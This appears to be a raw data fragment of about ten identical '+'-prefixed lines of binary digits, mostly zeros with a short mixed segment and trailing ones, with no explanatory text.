+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 